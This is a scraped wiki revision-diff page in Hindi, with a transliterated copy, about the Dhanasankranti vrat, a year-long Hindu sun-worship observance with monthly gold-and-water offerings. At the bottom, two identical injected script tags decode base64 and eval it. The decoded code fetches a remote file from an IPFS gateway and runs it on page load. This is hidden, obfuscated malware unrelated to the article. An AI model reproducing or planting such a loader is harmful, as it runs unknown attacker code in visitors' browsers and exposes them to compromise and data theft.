Difference between revisions of "धनसंक्रान्ति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
 
(4 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*संक्रान्ति के दिन पर आरम्भ होता है।  
 
*संक्रान्ति के दिन पर आरम्भ होता है।  
 
*यह व्रत एक वर्ष तक चलता है।
 
*यह व्रत एक वर्ष तक चलता है।
Line 6: Line 6:
 
*अन्त में स्वर्ण कमल एवं एक गाय का दान करना चाहिए।
 
*अन्त में स्वर्ण कमल एवं एक गाय का दान करना चाहिए।
 
*कर्ता को कई जीवनों तक स्वास्थ्य, सम्पत्ति तथा लम्बी आयु प्राप्त होती है।<ref>हेमाद्रि (व्रत0 2, 736-737, [[स्कन्द पुराण]] से उद्धरण)।</ref>  
 
*कर्ता को कई जीवनों तक स्वास्थ्य, सम्पत्ति तथा लम्बी आयु प्राप्त होती है।<ref>हेमाद्रि (व्रत0 2, 736-737, [[स्कन्द पुराण]] से उद्धरण)।</ref>  
 
+
{{प्रचार}}
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 12:25, 15 June 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • sankranti ke din par arambh hota hai.
  • yah vrat ek varsh tak chalata hai.
  • is vrat mean soory devata ki pooja hoti hai.
  • prati mas ek gh de mean jal tatha usamean ek svarn khand rakhakar "soory prasann hoan" ke sath dan kar dena chahie.
  • ant mean svarn kamal evan ek gay ka dan karana chahie.
  • karta ko kee jivanoan tak svasthy, sampatti tatha lambi ayu prapt hoti hai.[1]


tika tippani aur sandarbh

  1. hemadri (vrat0 2, 736-737, skand puran se uddharan).

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>